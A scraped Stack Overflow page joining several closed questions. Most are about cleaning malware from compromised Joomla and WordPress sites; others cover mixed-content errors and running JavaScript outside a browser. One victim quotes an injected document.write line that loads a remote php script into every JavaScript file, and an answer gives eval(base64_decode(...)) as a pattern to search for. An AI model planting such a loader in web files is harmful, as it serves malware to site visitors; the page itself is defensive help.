Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
A friend and I developed a page using Joomla 2.5.8 and set it up on a Linux webserver with Plesk.
Somehow someone injected a script which seems to be malware into the first line of the code.
And what's even more strange is that if I delete this script, it will be inserted somehow at the same place.
Does anyone have an idea how to fix this now?
To fix this:
Make sure your installation of joomla hasn't been compromised. Download the whole source code and compare it against a clean copy on a different computer to check this. There might be several files changed. One contains the code above, another reinstalls the code every time you delete it and a third one checks for updates of the other two and installs them.
Make sure the web server process cannot write any of the files of your joomla installation.
Make sure you deleted the install scripts.
Make sure you changed the default password.
Some attackers run a script which checks that your site is still cracked and crack it again every time you fix the problem. Upgrade to the latest version of joomla to fix this. If that doesn't help, you might have to take down your site for some time until the security hole is fixed.
If you have any plugins installed, upgrade or disable them.
Check for viruses/trojans on your server. If this is Linux, look for odd login attempts, processes that shouldn't be there, etc.
Always install all the security patches for your OS
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 6 years ago.
Improve this question
Some malware is injecting this script somewhere in my wordpress main page. I already went through all files in Editor but I find nothing about this. Any idea where can I find it? Its driving me crazy.
This script is injecting adware popups in my wordpress website.
Try downloading the whole theme folder and plugins folder (with all plugins). Then you would need to run search across all those files. Usually malware code is using eval functions so you should search for eval across all those files. Searching one by one would take forever so use grep tool.
For windows I would recommend windows grep
http://www.wingrep.com/
For Mac I would recommend visualGrep app which is paid app and costs around 2 bucks but totally worth it.
If you have linux then you would need to find the software yourself or you can run such a search from the command line. (Actually you can use CLI on any system but I just prefer having app with GUI fur such task)
in 99% of cases (from my experience) you will find something like:
eval(base64_decode('dsalkndsalndsnldakslasdkn'));
That will be the malware code and you should take care of it (remove). If the code is in the plugin, then you should get rid of such a plugin probably.
Hope this helps.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 6 years ago.
Improve this question
On this site, which is on Joomla and using a plugin called Matukio, the links on the left used to work, but no longer do and we are desperate to figure out why.
The company who makes the plugin replied with this info, but it sounds like he's just spouting a bunch of stuff that isn't really the cause (JUri::root() is working fine, the VWO stuff was there before when the links worked, etc).
I doubt anyone can give much insight based on this limited info, but just taking a shot bc stackoverflow is literally the best site on the internet for help. If anyone has any ideas on things i should look at, test, please share...
FROM MATUKIO:
you have JavaScript errors on your page (not caused by Matukio):
07:43:49.475 ReferenceError: Heatmap is not defined
<anonym>events:129
1events:129:3
ga('set', 'VWO', Heatmap);
Additionally the following is failing:
07:44:55.490 Loading of mixed contents "http://www.workwave.com/index.php?option=com_matukio&view=requests&format=raw&task=route_link&link=index.php%3FItemid%3D283%26option%3Dcom_matukio%26view%3Deventlist%26art%3D0%26catids%3D0%26search%3D%26limit%3D10%26dateid%3D2%26fees%3D0%26locations%3D0%26organizers%3D0%26ordering%3D1%26start%3D0&Itemid=283" was blocked .1jquery.min.js:5:25679
As you see the link looks right, but hte protocol is wrong. E.g. http
instead of https.. Are you using any plugin for https redirection? Or
htaccess? It seems that JUri::root() is not working correct on your
instance. Joomla has a setting for https in the global config.
Kind regards,
Yves
It's hard to tell without more information but it looks like your site is using HTTPS. This is a good thing. But one of the restrictions is that if you're using a secure connection, then you can't access resources that are stored on a server using the non-secure HTTP protocol (it's kind of buying a fancy lock for your front door and then leaving the window open.)
This is likely coming from the Heatmap library. If you're pull this library from a CDN, try changing the url to "https://" instead of "http://" and this should fix it.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
Well, perhaps this is silly but I wonder is it possible, to transfer a web app built in Javascript with some html and css to linux platform?
I made a youtube player smth like youtube client, and I want to use on my Ubuntu 15.04 OS, as an app.
Here is a preview:
and I would love it if it would look smth like this:
I know that this Google Mail is just loaded from a web, but I want to make it accessible from my Ubuntu. Just instead of this google I ant that my app gets in. I hope you understand...
As has been pointed out, JavaScript and HTML5 don't "natively" run on Linux -- so you'll have to find an application to wrap yours. Plenty of these things exist -- Electron is very popular, as is nw.js.
Well, I'll try to take a stab at answering your question:
If you want to run it natively on linux without any other application being involved the answer to your question is not without rewriting it to some other language. Linux does not run javascript natively.
If you want something thinner then a web browser perhaps something exists to run your web app for you, but it's essentially going to be a light web browser. If you want to run javascript there will always be some other application between you and the kernel unless the kernel specifically supports javascript which Linux does not (and AFAIK no kernel does).
So in short, based on what I think you're asking for, no.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 9 years ago.
Improve this question
My web site has been infested with a virus. All javascript files contain the following code:
/*a61bd2*/
document.write("<script src='http://www.blog-environnement.fr/wp-admin /DxRcTnm8.php?id=128633385' type='text/javascript'></" + "script>");
/*/a61bd2*/
I can clean it but I have to open each javascript individually to erase the code. I wonder if it is possible with a script to automatically erase this code from all javascripts within my web site?
If this is possible and if someone could give me some tips because as I don't want to have the problem again.
than you all, sorry for my english.
Don't try to clean up your compromised code. Get a clean copy and work with that instead.
Take your server off line
Check your workstation for malware (in case the attack vector was via something like stealing your passwords that way)
Build a clean server
Make sure it has the latest version of all the software / libraries that you depend on
Restore your site from a known good backup
Start monitoring your site to see if it gets compromised again
Examine the logs from the compromised server to see if you can find out the nature of the attack from there
Security audit all your code (both the clean backup and the edited version from the compromised server).
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 9 years ago.
Improve this question
So, a while back I wrote a script in Python to automatically register me to classes in my school (by creating a browser with mechanize and signing in with my user/password and clicking the buttons etc)
lately I've been trying to learn JavaScript/html/css and I was thinking JavaScript would be better suited for such stuff, but I don't really understand the concept of how it will work yet, because the only way I've seen JavaScript used is linked from an html file and then run when you load the html.
I was wondering how would I create a standalone JavaScript to do those kind of stuff without html and how would I run it? (Do I download an interpreter of some kind?)
I could find information about that kind of stuff through Googling though i'm sure it's there I just don't know what this is called (tried web mining and web crawling but it doesn't seem to be it)
No, wrong use. If you are going to try to use JS externally to manipulate a browser page, you are going to have to open a web console on your browser then paste the code in, which is totally impractical.
Node.js does let one write Javascript that has full file system access, etc. to your computer, so this would be your best bet, but your question is pretty vague so I can't tell if this is exactly what you would need.